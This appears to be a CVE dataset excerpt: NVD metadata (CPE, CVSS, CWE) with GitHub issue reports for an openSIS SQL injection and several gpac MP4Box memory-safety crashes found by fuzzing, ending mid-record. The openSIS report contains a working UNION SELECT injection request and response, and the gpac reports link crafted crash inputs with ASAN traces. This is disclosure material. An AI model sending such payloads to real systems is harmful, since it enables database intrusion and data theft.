[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:os4ed:opensis:8.0:*:*:*:community:*:*:*", "matchCriteriaId": "7159D18F-0406-4CBE-B985-FD2E8A5F07C9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "89" ]
89
https://github.com/OS4ED/openSIS-Classic/issues/193
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "OS4ED", "openSIS-Classic" ]
# Description: Because of lacking of sanitizer of input data, attacker can injection malicious sql into query by control parameters such as `ADDR_CONT_USRN`, `ADDR_CONT_PSWD` or `SECN_CONT_USRN`, `SECN_CONT_PSWD` in file `HoldAddressFields.php`. ### Request ``` POST /HoldAddressFields.php HTTP/1.1 Host: 172.16.0.12:2222 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: vi,vi-VN;q=0.9,fr;q=0.8,en-US;q=0.7,en;q=0.6,sm;q=0.5,la;q=0.4,zh-CN;q=0.3,zh-TW;q=0.2,zh;q=0.1 Cookie: cywg_2132_saltkey=E2w57uH2; cywg_2132_lastvisit=1630101103; cywg_2132_ulastactivity=6590uIjzBHML3smc7veG8yziPxJyaiN4jgoE9aN3L3FvOCr3Ov1_; ORRL_2132_saltkey=SSddxNX7; ORRL_2132_lastvisit=1630117184; ORRL_2132_ulastactivity=4e4933KaEc2d5jrijCQZlYd-PcZ8j470p8v4gqPXPHDs6JlJdGR4; ORRL_2132_forum_lastvisit=D_1_1630131788D_index_1630131832; PHPSESSID=i3j7fp3hcjbmot1d60daol514a Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 78 ADDR_CONT_USRN=123&ADDR_CONT_PSWD="+union+select+1,2,3,4,version(),6,7,8,9--+- ``` ### Response ``` HTTP/1.1 200 OK Date: Wed, 01 Sep 2021 12:38:58 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21 X-Powered-By: PHP/7.4.21 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache Content-Length: 1372 Connection: close Content-Type: text/html; charset=UTF-8 Array ( [ADDR_PRIM_L1] => [ADDR_PRIM_L2] => [ADDR_PRIM_CITY] => [ADDR_PRIM_STATE] => [ADDR_PRIM_ZIP] => [ADDR_PRIM_BUSNO] => [ADDR_PRIM_BPU] => [ADDR_PRIM_BDO] => [ADDR_SAME_HOME] => [ADDR_SAME_AS] => [ADDR_MAIL_L1] => [ADDR_MAIL_L2] => [ADDR_MAIL_CITY] => [ADDR_MAIL_STATE] => [ADDR_MAIL_ZIP] => [ADDR_CONT_RSHIP] => [ADDR_CONT_FIRST] => [ADDR_CONT_LAST] => [ADDR_CONT_HOME] => [ADDR_CONT_WORK] => [ADDR_CONT_CELL] => [ADDR_CONT_MAIL] => [ADDR_CONT_CUSTODY] => [ADDR_CONT_PORTAL] => [ADDR_CONT_USRN] => 123 [ADDR_CONT_PSWD] => 10.4.20-MariaDB [ADDR_CONT_SAHA] => [ADDR_CONT_ADNA] => [ADDR_CONT_LIN1] => [ADDR_CONT_LIN2] => [ADDR_CONT_CITY] => [ADDR_CONT_STAT] => [ADDR_CONT_ZIP] => [CHK_HOME_ADDR_PRIM] => [SECN_CONT_RSHIP] => [SECN_CONT_FIRST] => [SECN_CONT_LAST] => [SECN_CONT_HOME] => [SECN_CONT_WORK] => [SECN_CONT_CELL] => [SECN_CONT_MAIL] => [SECN_CONT_CUSTODY] => [SECN_CONT_PORTAL] => [SECN_CONT_USRN] => [SECN_CONT_PSWD] => [SECN_CONT_LIN1] => [SECN_CONT_LIN2] => [SECN_CONT_CITY] => [SECN_CONT_STAT] => [SECN_CONT_ZIP] => [CHK_HOME_ADDR_SECN] => [SELECTED_PRIMARY] => [SELECTED_SECONDARY] => ) ``` ### PoC: ![poc](https://user-images.githubusercontent.com/17811861/131673842-3ed048a9-e433-4ebb-806b-52a8f773ec67.png)
SQL Injection in file HoldAddressFields.php
https://api.github.com/repos/OS4ED/openSIS-Classic/issues/193/comments
2
2021-09-01T12:48:52Z
2021-09-09T22:20:28Z
https://github.com/OS4ED/openSIS-Classic/issues/193
985,110,700
193
2,693
CVE-2020-22673
2021-10-12T21:15:07.373
Memory leak in the senc_Parse function in MP4Box in gpac 0.8.0 allows attackers to cause a denial of service (DoS) via a crafted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1342" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1342" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "401" ]
401
https://github.com/gpac/gpac/issues/1342
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in box_code_drm.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [004-memleak-senc1349](https://github.com/gutiniao/afltest/blob/master/004-memleak-senc1349) The ASAN information is as follows: ``` ./MP4Box -diso 004-memleak-senc1349 -out /dev/null [iso file] Box "avcC" (start 939) has 34 extra bytes [iso file] Unknown box type 0000 in parent sinf [iso file] Unknown box type 75876C20 in parent dref [iso file] Unknown box type 0000 in parent schi [iso file] Unknown box type stts in parent stsd [iso file] Unknown box type stsc in parent stsd [iso file] Unknown box type stsz in parent stsd [iso file] Unknown box type stco in parent stsd [iso file] Unknown box type sgpd in parent stsd [iso file] Unknown box type udta in parent stsd [iso file] Box "stsd" (start 1439) has 8825 extra bytes [iso file] Box "stsd" is larger than container box [iso file] Box "stbl" size 291 (start 1431) invalid (read 9139) [ISO file] dataReferenceIndex set to 0 in sample entry, overriding to 1 [ISO file] dataReferenceIndex set to 0 in sample entry, overriding to 1 [ISO file] dataReferenceIndex set to 0 in sample entry, overriding to 1 [ISO file] dataReferenceIndex set to 0 in sample entry, overriding to 1 [iso file] senc box without tenc, assuming MS smooth+piff [isobmf] Failed to parse SENC box, invalid SAI size [isobmf] could not get cenc info for sample 1: Invalid IsoMedia File Error opening file 004-memleak-senc1349: Invalid IsoMedia File ================================================================= ==2371==ERROR: LeakSanitizer: detected memory leaks Direct leak of 32 byte(s) in 1 object(s) allocated from: #0 0x7f0fc2519b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50) #1 0x564665fcabe9 in senc_Parse isomedia/box_code_drm.c:1349 SUMMARY: AddressSanitizer: 32 byte(s) leaked in 1 allocation(s). ``` about code: ``` #endif count = gf_bs_read_u32(bs); if (!senc->samp_aux_info) senc->samp_aux_info = gf_list_new(); for (i=0; i<count; i++) { u32 is_encrypted; ---------->GF_CENCSampleAuxInfo *sai = (GF_CENCSampleAuxInfo *)gf_malloc(sizeof(GF_CENCSampleAuxInfo)); memset(sai, 0, sizeof(GF_CENCSampleAuxInfo)); ```
There are memory leaks in the senc_Parse function of box_code_drm.c:1349
https://api.github.com/repos/gpac/gpac/issues/1342/comments
1
2019-11-13T04:06:43Z
2020-01-09T17:59:51Z
https://github.com/gpac/gpac/issues/1342
521,946,411
1,342
2,694
CVE-2020-22674
2021-10-12T21:15:07.417
An issue was discovered in gpac 0.8.0. An invalid memory dereference exists in the function FixTrackID located in isom_intern.c, which allows attackers to cause a denial of service (DoS) via a crafted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1346" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1346" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "476" ]
476
https://github.com/gpac/gpac/issues/1346
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in isom_intern.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [009-invalid-FixTrackID](https://github.com/gutiniao/afltest/blob/master/009-invalid-FixTrackID) The ASAN information is as follows: ``` ./MP4Box -diso 009-invalid-FixTrackID -out /dev/null [iso file] Box "avcC" (start 939) has 34 extra bytes [iso file] Unknown box type 0000 in parent sinf [iso file] Unknown box type 74E8036B in parent moov [iso file] Unknown box type tfhd in parent moof [iso file] Box "UNKN" is larger than container box [iso file] Box "moof" size 1463 (start 2004) invalid (read 7972) ASAN:DEADLYSIGNAL ================================================================= ==13653==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x564b3322e701 bp 0x60d000000110 sp 0x7fff462fc3f0 T0) ==13653==The signal is caused by a READ memory access. ==13653==Hint: address points to the zero page. #0 0x564b3322e700 in FixTrackID isomedia/isom_intern.c:133 #1 0x564b3322e700 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:372 #2 0x564b3322fbca in gf_isom_open_file isomedia/isom_intern.c:615 #3 0x564b32f78852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767 #4 0x7fd75e925b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #5 0x564b32f69b19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV isomedia/isom_intern.c:133 in FixTrackID ==13653==ABORTING ```
Segmentation fault (ASAN: SEGV on unknown address) in the FixTrackID function of isom_intern.c:133
https://api.github.com/repos/gpac/gpac/issues/1346/comments
1
2019-11-13T07:15:54Z
2020-01-09T18:00:04Z
https://github.com/gpac/gpac/issues/1346
522,006,717
1,346
2,695
CVE-2020-22675
2021-10-12T21:15:07.457
An issue was discovered in gpac 0.8.0. The GetGhostNum function in stbl_read.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1344" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1344" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1344
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in stbl_read.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [006GetGhostNum-heap](https://github.com/gutiniao/afltest/blob/master/006GetGhostNum-heap) The ASAN information is as follows: ``` ./MP4Box -diso 006GetGhostNum-heap -out /dev/null [iso file] Box "avcC" (start 939) has 34 extra bytes [iso file] Unknown box type 0000 in parent sinf [iso file] Box "dref" (start 1403) has 4 extra bytes [iso file] Missing DataInformationBox [iso file] Box "minf" (start 1371) has 291 extra bytes [iso file] Track with no sample table ! [iso file] Track with no sample description box ! ================================================================= ==7153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000454 at pc 0x5572c94aafff bp 0x7fff10f02f50 sp 0x7fff10f02f40 READ of size 4 at 0x602000000454 thread T0 #0 0x5572c94aaffe in GetGhostNum isomedia/stbl_read.c:369 #1 0x5572c94aaffe in stbl_GetSampleInfos isomedia/stbl_read.c:436 #2 0x5572c943e253 in gf_isom_get_sample_cenc_info_ex isomedia/isom_read.c:4153 #3 0x5572c98c8c2f in senc_Parse isomedia/box_code_drm.c:1353 #4 0x5572c94203e6 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:399 #5 0x5572c9422bca in gf_isom_open_file isomedia/isom_intern.c:615 #6 0x5572c916b852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767 #7 0x7f0e00306b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #8 0x5572c915cb19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19) 0x602000000454 is located 3 bytes to the right of 1-byte region [0x602000000450,0x602000000451) allocated by thread T0 here: #0 0x7f0e00f8fb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50) #1 0x5572c98a424a in stsc_Read isomedia/box_code_base.c:5734 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/stbl_read.c:369 in GetGhostNum Shadow bytes around the buggy address: 0x0c047fff8030: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 01 fa 0x0c047fff8040: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8050: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8060: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff8070: fa fa 00 00 fa fa 00 00 fa fa fd fd fa fa fd fd =>0x0c047fff8080: fa fa 00 00 fa fa 01 fa fa fa[01]fa fa fa 00 00 0x0c047fff8090: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 01 fa 0x0c047fff80a0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff80b0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 00 0x0c047fff80c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 01 fa 0x0c047fff80d0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==7153==ABORTING ```
There is a heap-buffer-overflow in the GetGhostNum function of stbl_read.c:369
https://api.github.com/repos/gpac/gpac/issues/1344/comments
1
2019-11-13T05:18:43Z
2020-01-09T17:59:57Z
https://github.com/gpac/gpac/issues/1344
521,966,021
1,344
2,696
CVE-2020-22677
2021-10-12T21:15:07.497
An issue was discovered in gpac 0.8.0. The dump_data_hex function in box_dump.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1341" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1341" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/1341
[ "Exploit", "Patch", "Third Party Advisory" ]
github.com
[ "gpac", "gpac" ]
Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you! [ √] I looked for a similar issue and couldn't find any. [ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/ [ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95 Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/ A crafted input will lead to crash in box_dump.c at gpac 0.8.0. Triggered by ./MP4Box -diso POC -out /dev/null Poc [003-heep-dump_data51](https://github.com/gutiniao/afltest/blob/master/003-heep-dump_data51) The ASAN information is as follows: ``` ./MP4Box -diso 003-heep-dump_data51 -out /dev/null [iso file] Box "avcC" (start 939) has 34 extra bytes [iso file] Unknown box type 0000 in parent sinf [iso file] Unknown box type 0000 in parent schi [iso file] Box "tfhd" size 20 (start 2642) invalid (read 28) [iso file] senc box without tenc, assuming MS smooth+piff [isobmf] Failed to parse SENC box, invalid SAI size [isobmf] Failed to parse SENC box, invalid SAI size [iso file] Unknown top-level box type 00303030 [iso file] Incomplete box 00303030 - start 3467 size 808453500 [iso file] Incomplete file while reading for dump - aborting parsing ================================================================= ==5711==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000990 at pc 0x563f30697440 bp 0x7ffd8a7496b0 sp 0x7ffd8a7496a0 READ of size 1 at 0x603000000990 thread T0 #0 0x563f3069743f in dump_data_hex isomedia/box_dump.c:51 #1 0x563f3069743f in senc_dump isomedia/box_dump.c:4823 #2 0x563f306a06ad in gf_isom_box_dump_ex isomedia/box_funcs.c:1738 #3 0x563f3067c5bc in gf_isom_box_dump isomedia/box_dump.c:97 #4 0x563f3067c5bc in gf_isom_box_array_dump isomedia/box_dump.c:107 #5 0x563f306a07cf in gf_isom_box_dump_done isomedia/box_funcs.c:1747 #6 0x563f3068b939 in traf_dump isomedia/box_dump.c:2461 #7 0x563f306a06ad in gf_isom_box_dump_ex isomedia/box_funcs.c:1738 #8 0x563f3067c5bc in gf_isom_box_dump isomedia/box_dump.c:97 #9 0x563f3067c5bc in gf_isom_box_array_dump isomedia/box_dump.c:107 #10 0x563f306a07cf in gf_isom_box_dump_done isomedia/box_funcs.c:1747 #11 0x563f3068b389 in moof_dump isomedia/box_dump.c:2431 #12 0x563f306a06ad in gf_isom_box_dump_ex isomedia/box_funcs.c:1738 #13 0x563f3067c7f3 in gf_isom_box_dump isomedia/box_dump.c:97 #14 0x563f3067c7f3 in gf_isom_dump isomedia/box_dump.c:139 #15 0x563f3041b734 in dump_isom_xml /home/liuz/gpac-master/applications/mp4box/filedump.c:1930 #16 0x563f30405c92 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4982 #17 0x7f6e421e6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96) #18 0x563f303f2b19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19) 0x603000000990 is located 0 bytes to the right of 32-byte region [0x603000000970,0x603000000990) allocated by thread T0 here: #0 0x7f6e42e6fb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50) #1 0x563f30b5ebe9 in senc_Parse isomedia/box_code_drm.c:1349 SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_dump.c:51 in dump_data_hex Shadow bytes around the buggy address: 0x0c067fff80e0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff80f0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 0x0c067fff8100: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 0x0c067fff8110: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa 0x0c067fff8120: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 =>0x0c067fff8130: 00 00[fa]fa 00 00 00 00 fa fa fd fd fd fd fa fa 0x0c067fff8140: 00 00 00 00 fa fa fd fd fd fd fa fa fa fa fa fa 0x0c067fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c067fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb ==5711==ABORTING ```
There is a heap-buffer-overflow in the dump_data_hex function of box_dump.c:51
https://api.github.com/repos/gpac/gpac/issues/1341/comments
1
2019-11-13T03:49:59Z
2020-01-09T17:59:47Z
https://github.com/gpac/gpac/issues/1341
521,942,076
1,341
2,697
CVE-2020-22678
2021-10-12T21:15:07.540
An issue was discovered in gpac 0.8.0. The gf_media_nalu_remove_emulation_bytes function in av_parsers.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1339" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Patch", "Third Party Advisory" ], "url": "https://github.com/gpac/gpac/issues/1339" } ]
